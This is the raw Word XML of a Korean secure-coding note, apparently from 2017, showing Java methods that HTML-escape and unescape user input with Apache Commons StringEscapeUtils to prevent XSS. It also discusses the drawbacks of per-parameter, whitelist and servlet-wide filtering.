              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b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r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>escapeMessage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = escape(message);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426E412C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System.out.printl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("Escape : " +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escapeMessag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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC70742" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
            <w:pPr>
              <w:ind w:left="800"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b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r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>unescapeMessage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>unescape</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>escapeMessage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606E3362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System.out.printl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"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Unescap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: " +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unescapeMessag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+ "\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB63095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14:paraId="2E72B93E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14:paraId="023955C5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14:paraId="6C9C1CAA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  <w:t xml:space="preserve">public static String </w:t>
            </w:r>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>escape</w:t>
            </w:r>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(String value) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C048525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Pattern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escapePatter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=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Pattern.compil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"'");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1474AFB1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14:paraId="5B84C535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if (value == null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8E6D08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return null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F97929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14:paraId="2EAA0F02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</w:p>
          <w:p w14:paraId="4D0E95E5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String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trustValu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= StringEscapeUtils.escapeHtml4(value); // &amp;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lt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, &amp;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gt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, &amp;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quot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 문자 치환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="439947AF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14:paraId="6A5FE814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Matcher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match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=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escapePattern.match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trustValu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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C57297E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if (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matcher.find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)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DFCBFF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return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matcher.replaceAll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"&amp;#39"); // &amp;#39 치환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A1CDFA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14:paraId="5467CF94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14:paraId="2D933FDA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return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trustValu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14:paraId="050554EE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14:paraId="3897F3EC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</w:p>
          <w:p w14:paraId="387566D2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  <w:t xml:space="preserve">public static String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>unescap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String value) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF66813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Pattern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unescapePatter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=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Pattern.compil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"&amp;#39;");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A0355F4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14:paraId="5D053C31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if (value == null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE319BD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return null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5F3DC1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14:paraId="23D0E3A4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14:paraId="1FB9CBD8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String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originalValu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= StringEscapeUtils.unescapeHtml4(value); // &lt;, &gt;, " 치환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CDD8F6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14:paraId="350937C0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Matcher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match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=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unescapePattern.match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originalValu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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DAC872F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if (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matcher.find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)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECAE606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return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matcher.replaceAll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("'"); //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싱글쿼터로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치환</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E746C0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14:paraId="0B921409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return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originalValu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14:paraId="7E176067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14:paraId="61DA4607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>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005904AE" w14:paraId="37D8E97B" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="1374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36746195" w14:textId="77777777" w:rsidR="005904AE" w:rsidRPr="005904AE" w:rsidRDefault="005904AE" w:rsidP="005904AE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904AE">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>실행 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9476" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D051A5" w14:textId="77777777" w:rsidR="005904AE" w:rsidRPr="00431F07" w:rsidRDefault="005904AE" w:rsidP="005904AE">
            <w:pPr>
              <w:ind w:leftChars="100" w:left="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia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8C0540" wp14:editId="6BB24D8D">
                  <wp:extent cx="4107396" cy="726141"/>
                  <wp:effectExtent l="0" t="0" r="762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b="10989"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4123810" cy="729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81D28D" w14:textId="77777777" w:rsidR="00A62BE3" w:rsidRPr="00A62BE3" w:rsidRDefault="005904AE" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">제약사항이 없으므로 </w:t>
      </w:r>
      <w:r w:rsidR="00431F07" w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>구현이 간단하</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">다. </w:t>
      </w:r>
      <w:r w:rsidR="00A62BE3" w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대상 문자열에 존재하는 스크립트 관련 특수문자 모두를</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.commons.lang3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62BE3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.StringEscapeUtils 라이브러리를 사용하여 치환 및 복구한다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A772DE8" w14:textId="77777777" w:rsidR="00A62BE3" w:rsidRDefault="00A62BE3" w:rsidP="00A62BE3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79291071" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00A62BE3" w:rsidRDefault="00A62BE3" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">새롭게 추가되는 인자 각각에 반복적으로 필터 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>메소드를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 적용해야 하는 번거로움이 있으며, </w:t>
      </w:r>
      <w:r w:rsidR="008B2D11">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>예외적으로 태그의 사용이 필요한 게시판과 같은 어플리케이션</w:t>
      </w:r>
      <w:r w:rsidR="00B659BD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>에 바로 적용할 수 없으므로 HTML이 아닌 단순 텍스트 인자에 적합하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768C639" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRDefault="00B659BD" w:rsidP="00B659BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비즈니스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로직에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 전달되는 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49894642" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRPr="00B659BD" w:rsidRDefault="00B659BD" w:rsidP="00B659BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">사용자 입력 값이 뷰에 노출시킬 목적이 아닌 비즈니스 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로직에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 사용될 경우 치환으로 인한 원본 데이터 훼손의 우려가 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32592BBE" w14:textId="77777777" w:rsidR="00437072" w:rsidRDefault="00437072" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EFE2BB" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRDefault="00B659BD" w:rsidP="00B659BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTML 태그 사용이 필요한 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9D716" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRDefault="004F296A" w:rsidP="00B659BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML 태그가 동작해야 하므로 White List 방식의 XSS 공격 구문 필터가 요구된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D0E7A" w14:textId="77777777" w:rsidR="004F296A" w:rsidRDefault="004F296A" w:rsidP="00B659BD"/>
    <w:p w14:paraId="0FC153F6" w14:textId="77777777" w:rsidR="008827C8" w:rsidRDefault="004F296A" w:rsidP="008827C8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일괄적으로 필터를 적용하고자 하는 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEBE97" w14:textId="77777777" w:rsidR="008827C8" w:rsidRPr="008827C8" w:rsidRDefault="008827C8" w:rsidP="008827C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Servlet으로 </w:t>
      </w:r>
      <w:r w:rsidR="004F296A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 구문을 필터 한다</w:t>
      </w:r>
      <w:r w:rsidR="004F296A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. 쉽게 적용할 수 있지만 입력 인자 모두에 적용되므로 의도치 않은 결과를 발생시킬 수 있으며, 필터가 불필요한 인자도 포함되므로 서비스 성능의 저하를 가져온다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA25F80" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRPr="008827C8" w:rsidRDefault="00B659BD" w:rsidP="00B659BD"/>
    <w:sectPr w:rsidR="00B659BD" w:rsidRPr="008827C8" w:rsidSect="00431F0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코딩">
    <w:altName w:val="Malgun Gothic Semilight"/>
    <w:panose1 w:val="020D0009000000000000"/>
    <w:charset w:val="81"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0008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D3F0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28245A22"/>
    <w:lvl w:ilvl="0" w:tplc="A5DEA4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55137331"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28245A22"/>
    <w:lvl w:ilvl="0" w:tplc="A5DEA4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651C3419"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15F6C14E"/>
    <w:lvl w:ilvl="0" w:tplc="3F88CD4A">
      <w:start w:val="5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6CEE3734"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD787522"/>
    <w:lvl w:ilvl="0" w:tplc="44888CEC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4">
    <w:nsid w:val="7B7804BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82B49E82"/>
    <w:lvl w:ilvl="0" w:tplc="0C6257B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>
    <w:nsid w:val="7E654D84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3244C236"/>
    <w:lvl w:ilvl="0" w:tplc="D58CF3F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1600" w:hanging="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="나눔고딕코딩" w:eastAsia="나눔고딕코딩" w:hAnsi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07"/>
    <w:rsid w:val="00010531"/>
    <w:rsid w:val="0002704B"/>
    <w:rsid w:val="00070285"/>
    <w:rsid w:val="00096F6F"/>
    <w:rsid w:val="00182BCA"/>
    <w:rsid w:val="002955C1"/>
    <w:rsid w:val="002C1CD1"/>
    <w:rsid w:val="00373126"/>
    <w:rsid w:val="00394687"/>
    <w:rsid w:val="003B5583"/>
    <w:rsid w:val="003C4836"/>
    <w:rsid w:val="003F170A"/>
    <w:rsid w:val="00431F07"/>
    <w:rsid w:val="00437072"/>
    <w:rsid w:val="00496245"/>
    <w:rsid w:val="004A0620"/>
    <w:rsid w:val="004F296A"/>
    <w:rsid w:val="005904AE"/>
    <w:rsid w:val="005C1003"/>
    <w:rsid w:val="00684E4C"/>
    <w:rsid w:val="0069772D"/>
    <w:rsid w:val="008827C8"/>
    <w:rsid w:val="008B2D11"/>
    <w:rsid w:val="008C3A40"/>
    <w:rsid w:val="008D2128"/>
    <w:rsid w:val="009A2F22"/>
    <w:rsid w:val="009C2CA8"/>
    <w:rsid w:val="009E0257"/>
    <w:rsid w:val="00A62BE3"/>
    <w:rsid w:val="00AD7532"/>
    <w:rsid w:val="00B625F3"/>
    <w:rsid w:val="00B659BD"/>
    <w:rsid w:val="00B813AF"/>
    <w:rsid w:val="00D14A6E"/>
    <w:rsid w:val="00D54CD4"/>
    <w:rsid w:val="00E81139"/>
    <w:rsid w:val="00EE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E4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31F0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1F0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1F0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1F0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31F07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31F0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31F07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431F07"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00431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1F07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9A2F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A2F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31F0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1F0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1F0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1F0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31F07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31F0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31F07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431F07"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00431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1F07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9A2F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A2F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0792-C995-404D-9C22-848C3A61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7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s965</dc:creator>
  <cp:lastModifiedBy>etas965</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-13T05:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-19T23:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>